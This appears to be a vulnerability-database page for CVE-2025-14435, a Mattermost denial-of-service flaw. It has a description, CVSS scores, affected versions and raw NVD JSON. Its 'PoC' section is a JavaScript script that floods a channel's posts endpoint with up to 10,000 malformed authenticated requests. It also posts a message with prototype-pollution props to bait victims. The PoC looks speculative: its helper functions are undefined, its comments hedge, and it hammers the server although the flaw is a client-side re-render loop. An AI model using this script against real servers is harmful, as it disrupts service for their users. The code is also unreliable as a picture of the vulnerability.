Security Vulnerability Report
CVE-2025-14435 CVSS 6.8 MEDIUM

CVE-2025-14435

Published: 2026-01-16 12:15:50
Last Modified: 2026-01-20 15:06:30

Description

Mattermost versions 10.11.x <= 10.11.8, 11.1.x <= 11.1.1, 11.0.x <= 11.0.6 fail to prevent infinite re-renders on API errors which allows authenticated users to cause application-level DoS via triggering unbounded component re-render loops.

CVSS Details

CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE
Mattermost 10.11.x <= 10.11.8
Mattermost 11.1.x <= 11.1.1
Mattermost 11.0.x <= 11.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-14435 PoC - Trigger Infinite Re-render via API Error Loop
// This PoC demonstrates how an authenticated user can trigger unbounded re-render loops
// Note: authenticate(), postMessage(), MATTERMOST_API_BASE and CHANNEL_ID are
// referenced below but are not defined anywhere on this page.

const sleep = (ms) => new Promise(resolve => setTimeout(resolve, ms));

async function triggerReRenderLoop(targetChannelId) {
  console.log('[+] Starting infinite re-render attack for CVE-2025-14435');

  // Step 1: Authenticate with Mattermost
  const authToken = await authenticate('[email protected]', 'password123');

  // Step 2: Target a specific channel to trigger the re-render vulnerability
  const targetUrl = `${MATTERMOST_API_BASE}/channels/${targetChannelId}/posts`;

  let requestCount = 0;
  const maxRequests = 10000;

  while (requestCount < maxRequests) {
    try {
      // Send malformed request to trigger API error
      const response = await fetch(targetUrl, {
        method: 'POST',
        headers: {
          'Authorization': `Bearer ${authToken}`,
          'Content-Type': 'application/json',
          'X-Custom-Header': 'trigger_error' // Custom header to trigger error path
        },
        body: JSON.stringify({
          // Malformed data to trigger error handling
          message: '', // Empty message may trigger validation error
          file_ids: ['A'.repeat(1000)] // Potentially invalid file ID
        })
      });

      if (!response.ok) {
        // Error response may trigger infinite re-render loop in vulnerable versions
        console.log(`[+] Error triggered: ${response.status} at request ${requestCount}`);
        // The error response combined with component state update triggers re-render
      }

      requestCount++;
      await sleep(10); // Small delay between requests
    } catch (error) {
      console.log(`[+] Exception caught: ${error.message}`);
      // Network errors combined with retry logic may intensify re-render
    }
  }

  console.log('[+] Attack completed - target should experience DoS condition');
}

// Alternative: Social Engineering approach - trick user into triggering the bug
async function socialEngineeringPoC() {
  // Create a malicious message with embedded trigger
  const maliciousPayload = {
    message: 'Click here to view important update',
    props: {
      // Malformed props that trigger API error on interaction
      callback_url: 'javascript:void(0)',
      __proto__: { poll: { invalid: true } }
    }
  };

  // Post to target channel
  await postMessage(CHANNEL_ID, maliciousPayload);
  console.log('[+] Malicious message posted - waiting for victim interaction');
}

// Run the PoC
triggerReRenderLoop(CHANNEL_ID);

References

https://mattermost.com/security-updates (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14435", "sourceIdentifier": "[email protected]", "published": "2026-01-16T12:15:49.583", "lastModified": "2026-01-20T15:06:30.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 10.11.x <= 10.11.8, 11.1.x <= 11.1.1, 11.0.x <= 11.0.6 fail to prevent infinite re-renders on API errors which allows authenticated users to cause application-level DoS via triggering unbounded component re-render loops."}, {"lang": "es", "value": "Las versiones de Mattermost 10.11.x <= 10.11.8, 11.1.x <= 11.1.1, 11.0.x <= 11.0.6 no impiden las re-renderizaciones infinitas en errores de API, lo que permite a usuarios autenticados causar un DoS a nivel de aplicación mediante el desencadenamiento de bucles de re-renderización de componentes ilimitados."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": 
[{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.9", "matchCriteriaId": "2C87F454-776F-471C-8719-3434C715A1AC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.7", "matchCriteriaId": "F49BC4E6-A956-4FB4-B674-5C8915543B28"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.1.0", "versionEndExcluding": "11.1.2", "matchCriteriaId": "06F4B62A-AEF6-410C-BB99-830F39E33794"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}